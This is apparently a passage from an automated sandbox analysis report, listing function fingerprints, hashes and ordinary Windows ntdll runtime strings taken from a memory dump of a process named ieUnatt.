                                                                                  • Associated: 00000008.00000002.4677342991.000000000443E000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_42a0000_ieUnatt.jbxd
                                                                                  Similarity
                                                                                  • API ID: ___swprintf_l
                                                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                  • API String ID: 48624451-2108815105
                                                                                  • Opcode ID: bb8887424a2c6c15ba3c20935f1842c20be4e1997dd2ca2f5db59e7e7d728be9
                                                                                  • Instruction ID: ba99c74ab9b973b227808dd92fe92d237a0ab637fb546c2328826184753f9df1
                                                                                  • Opcode Fuzzy Hash: bb8887424a2c6c15ba3c20935f1842c20be4e1997dd2ca2f5db59e7e7d728be9
                                                                                  • Instruction Fuzzy Hash: 105103B5B40745AFDB20EE9CC89087FF7F8AF44204B50989DE896D3641E6B4FA008B60
                                                                                  Strings
                                                                                  • Execute=1, xrefs: 04344713
                                                                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 04344787
                                                                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 04344655
                                                                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 043446FC
                                                                                  • ExecuteOptions, xrefs: 043446A0
                                                                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 04344742
                                                                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 04344725
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4677342991.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000008.00000002.4677342991.000000000443E000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_42a0000_ieUnatt.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                  • API String ID: 0-484625025
                                                                                  • Opcode ID: d43ee76a7afb2b68a163b44e9dc648e97b608df91d76c2788328ec4ef0f6fe8e
                                                                                  • Instruction ID: d350f068fb2b0a68b6c24177c4211c665c4d0eb3cb7c233cfe186d780e230184
                                                                                  • Opcode Fuzzy Hash: d43ee76a7afb2b68a163b44e9dc648e97b608df91d76c2788328ec4ef0f6fe8e
                                                                                  • Instruction Fuzzy Hash: B951077170021D6BFB10AAA4DCA5FFA77A8EF08744F1452A9E506A71D0EB70BA418F91
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4677342991.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000008.00000002.4677342991.000000000443E000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_42a0000_ieUnatt.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                                  • Instruction ID: 56bad586e3b9be6ed1a2ade722ab09b7d303a8547cba613bba489f2421fbcaab
                                                                                  • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                                  • Instruction Fuzzy Hash: 3E021571548341AFD308CF28C591E6FBBE9EFC8714F04A92DB9898B264DB31E915CB42
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4677342991.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000008.00000002.4677342991.000000000443E000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_42a0000_ieUnatt.jbxd
                                                                                  Similarity
                                                                                  • API ID: __aulldvrm
                                                                                  • String ID: +$-$0$0
                                                                                  • API String ID: 1302938615-699404926
                                                                                  • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                  • Instruction ID: 4773f6ca566b31ba137570a9d4866d90504b5608256198f6fa7f4269043d9675
                                                                                  • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                  • Instruction Fuzzy Hash: 1581D070E052498FEF2C8E68C8917FEFBB1AF55760F186119E861A72B0C734B840CB60
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4677342991.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000008.00000002.4677342991.000000000443E000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_42a0000_ieUnatt.jbxd
                                                                                  Similarity
                                                                                  • API ID: ___swprintf_l
                                                                                  • String ID: %%%u$[$]:%u
                                                                                  • API String ID: 48624451-2819853543
                                                                                  • Opcode ID: feabc0b40e2c94767c14411e9acdfed5073f2bbda23eb355bc34f4348844888d
                                                                                  • Instruction ID: 50875975b1f97d457f64cc9b5154212daca46f7d42b76bea4abd2ae15e5876ed
                                                                                  • Opcode Fuzzy Hash: feabc0b40e2c94767c14411e9acdfed5073f2bbda23eb355bc34f4348844888d
                                                                                  • Instruction Fuzzy Hash: C0215176A00219ABDB14EEB9DC40AEFBBF8EF54744F54115AE915E3200E730B9158BA1
                                                                                  Strings
                                                                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 043402BD
                                                                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 043402E7
                                                                                  • RTL: Re-Waiting, xrefs: 0434031E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4677342991.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000008.00000002.4677342991.000000000443E000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_42a0000_ieUnatt.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                  • API String ID: 0-2474120054
                                                                                  • Opcode ID: 296d471aa7f7ad0f86e64be08c0a30116b3c0884fd6d1147889030320ac24c20
                                                                                  • Instruction ID: 9579cf730aa6fd58cc74acbb99bf4304cc9fb674f7ed18ef4c39073d2c02f0cc
                                                                                  • Opcode Fuzzy Hash: 296d471aa7f7ad0f86e64be08c0a30116b3c0884fd6d1147889030320ac24c20
                                                                                  • Instruction Fuzzy Hash: B1E1AE307247419FD724CF28C984B6AF7E0AF88714F550A6AF6A58B6E0E774F844CB42
                                                                                  Strings
                                                                                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 04347B7F
                                                                                  • RTL: Re-Waiting, xrefs: 04347BAC
                                                                                  • RTL: Resource at %p, xrefs: 04347B8E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4677342991.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000008.00000002.4677342991.000000000443E000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_42a0000_ieUnatt.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                  • API String ID: 0-871070163
                                                                                  • Opcode ID: c550dba10fd4f8018074d0b2ff927674af5c5096c295616f6ac76433bcb4d9ea
                                                                                  • Instruction ID: 7905f8ce18a29ea017769e53f3a307449cfcb287e3ee9339194deba8e6edb3e7
                                                                                  • Opcode Fuzzy Hash: c550dba10fd4f8018074d0b2ff927674af5c5096c295616f6ac76433bcb4d9ea
                                                                                  • Instruction Fuzzy Hash: E641E0353007029FD724DE29D850B6AB7E9EF89724F005A1DF99AAB690DB30F805CB91
                                                                                  APIs
                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0434728C
                                                                                  Strings
                                                                                  • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 04347294
                                                                                  • RTL: Re-Waiting, xrefs: 043472C1
                                                                                  • RTL: Resource at %p, xrefs: 043472A3
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4677342991.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000008.00000002.4677342991.000000000443E000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_42a0000_ieUnatt.jbxd
                                                                                  Similarity
                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                  • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                  • API String ID: 885266447-605551621
                                                                                  • Opcode ID: 34093e533ddc2897ee23038cb1b37b2e31d1085ebeb4187991ff8b9b7929e1ff
                                                                                  • Instruction ID: 023a1b1b378441138356c4146a370406a25bf91e5a9654395ee48f5efece7763
                                                                                  • Opcode Fuzzy Hash: 34093e533ddc2897ee23038cb1b37b2e31d1085ebeb4187991ff8b9b7929e1ff
                                                                                  • Instruction Fuzzy Hash: 2D410035700602AFD720DE65CC41FAAB7E9FF84714F206619FD95AB680DB21F8428BD1
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4677342991.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000008.00000002.4677342991.000000000443E000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_42a0000_ieUnatt.jbxd
                                                                                  Similarity
                                                                                  • API ID: ___swprintf_l
                                                                                  • String ID: %%%u$]:%u
                                                                                  • API String ID: 48624451-3050659472
                                                                                  • Opcode ID: 5ec723ad53aa336cfae795a1fcf0fc5773ec51597eda4d48a1c575392294261a
                                                                                  • Instruction ID: bba6c4f1bd827e6711bbb61df2681ddaec5da3fa6ae83ced0d97abef90d276df
                                                                                  • Opcode Fuzzy Hash: 5ec723ad53aa336cfae795a1fcf0fc5773ec51597eda4d48a1c575392294261a
                                                                                  • Instruction Fuzzy Hash: 6E318676A002199FDB24DE29CC50BEFB7F8EF44710F945599E849E3200EB70BA448FA1
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4677342991.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000008.00000002.4677342991.000000000443E000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_42a0000_ieUnatt.jbxd
                                                                                  Similarity
                                                                                  • API ID: __aulldvrm
                                                                                  • String ID: +$-
                                                                                  • API String ID: 1302938615-2137968064
                                                                                  • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                  • Instruction ID: 780f753c33cc798481d9be3746f5c8ee9378d69309745630bc9e1664b5af3c3c
                                                                                  • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                  • Instruction Fuzzy Hash: 52919371E0021A9BDF2CDE69C881ABFB7E5AF44760F18651AE855E72E0E730B9418760
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4677342991.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000008.00000002.4677342991.000000000443E000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_42a0000_ieUnatt.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: $$@
                                                                                  • API String ID: 0-1194432280
                                                                                  • Opcode ID: 3910606eca533fc754efbfac6732b30cd97576c24d74a308cc1e8a527a151510
                                                                                  • Instruction ID: f41de42d29fe03958b628f88aabc407db69d614dd6f85b744066dc301fbb9da1
                                                                                  • Opcode Fuzzy Hash: 3910606eca533fc754efbfac6732b30cd97576c24d74a308cc1e8a527a151510
                                                                                  • Instruction Fuzzy Hash: BE81FDB1E102699BDB35CF54CC45BEEB7B8AF48754F0041DAA919B7240D770AE84CF64